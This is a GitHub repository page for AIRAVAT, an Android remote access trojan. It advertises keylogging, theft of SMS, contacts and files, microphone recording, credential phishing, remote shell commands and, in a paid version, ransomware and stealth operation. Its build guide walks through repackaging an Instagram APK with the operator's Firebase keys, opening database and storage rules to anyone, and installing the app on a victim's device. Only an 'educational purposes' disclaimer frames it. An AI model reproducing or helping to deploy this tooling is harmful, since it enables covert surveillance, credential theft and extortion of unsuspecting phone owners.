Skip to content

A multifunctional Android RAT with GUI based Web Panel without port forwarding.

License

Notifications You must be signed in to change notification settings

gwaan83/AIRAVAT

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

59 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

AIRAVAT

A multifunctional Android RAT with GUI based Web Panel without port forwarding.

https://telegram.me/th30neand0nly0ne https://telegram.me/th30neand0nly

Features

  • Read all the files of Internal Storage
  • Download Any Media to your Device from Victims Device
  • Get all the system information of Victim Device
  • Retrieve the List of Installed Applications
  • Retrive SMS
  • Retrive Call Logs
  • Retrive Contacts
  • Send SMS
  • Gets all the Notifications
  • Keylogger
  • Admin Permission
  • Show Phishing Pages to steal credentials through notification.
    • Steal credentials through pre built phishing pages
    • Open any suspicious website through notification to steal credentials.
  • Record Audio through Mic
  • Play music in Victim's device
  • Vibrate Device
  • Text To Speech
  • Turn On/Off Torch Light
  • Change Wallpaper
  • Run shell Commands
  • Get Clipboard text (Only When app's Activity is visible)
  • Launch Any URL (Only When app's Activity is visible)
  • Pre Binded with Instagram Webview Phishing
  • Runs In Background
    • Auto Starts on restarting the device
    • Auto Starts when any notification arrives
  • No port forwarding needed

Requirements

How to Build

Firebase Setup

  1. Create an Firebase Account and afterwords create a new project with any name.
  2. Enable Firebase Database and Firebase Storage.
  3. In Firebase Database Click on the rules and set .read and .write to true
    •     {
           "rules": {
                   ".read": "true",
                   ".write": "true"
                    }
          }
  4. In Firebase Storage allow reads and writes for all paths.
    •   rules_version = '2';
        service firebase.storage {
        match /b/{bucket}/o {
            match /{allPaths=**} {
               allow read, write 
              }
          }
       }
  5. Now Go to project overview and create an Android App and download the google-services.json file.
  6. Also create a web app and copy the config of webapp.

Panel Setup

  1. You can use Github Pages , Firebase Hosting or any Hosting Website (except 000webhost) for hosting the panel.
  2. Open index.html File and from line number 16 replace the config with your web app config which you have created on Step 6.
  3. Save the file , Your Panel Setup is completed.

Android RAT

  1. Download Instagram.apk
  2. Decompile it using any Decompiler recommend above.
  3. Now open res/values/strings.xml file.
  4. Replace values of firebase_database_url , google_api_key , google_app_id , google_storage_bucket , project_id with your Firebase Account using google-services.json file which you have downloaded on step 5
    • Example
      <string name="firebase_database_url">https://your_database_url.firebase.com</string>
      <string name="google_api_key">your_api_key</string>
      <string name="google_app_id">your_app_id</string>
      <string name="google_storage_bucket">your_storage_bucket_url</string>
      <string name="project_id">project_id</string>
  5. Now compile the code with appt2.
  6. Install the app in victim's device and give all the permissions after that the connection will show up in web panel.

PoC Video

  1. https://youtu.be/i3JAHcsWwu0 (old video)

Tutorial Videos

  1. https://t.me/AiravatRat/3 (Mr.Ethical YT)

❤️Supporters❤️

Stargazers repo roster for @th30neand0nly/AIRAVAT

Forkers repo roster for @th30neand0nly/AIRAVAT

AIRAVAT PRO

  1. Read , Delete files from victim's device
  2. Encrypt any file in victim's device
  3. Lock Victims Device with 4 digit Pin Code
  4. Capture Photo from Front and Back Camera
  5. Capture Screenshot from background
  6. Automatically Record Incoming and Outgoing Calls
  7. Get Sim Card Information
  8. Ransomware (encrypt all the files and show the notification demanding for ransom)
  9. Auto Start Permission for all chinese vendors.
  10. Hidden App without Foreground service notification (full stealth mode)

PoC Video

  1. https://t.me/th30neand0nly0ne/21

DISCLAIMER

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the AIRAVAT is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.

About

A multifunctional Android RAT with GUI based Web Panel without port forwarding.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • HTML 100.0%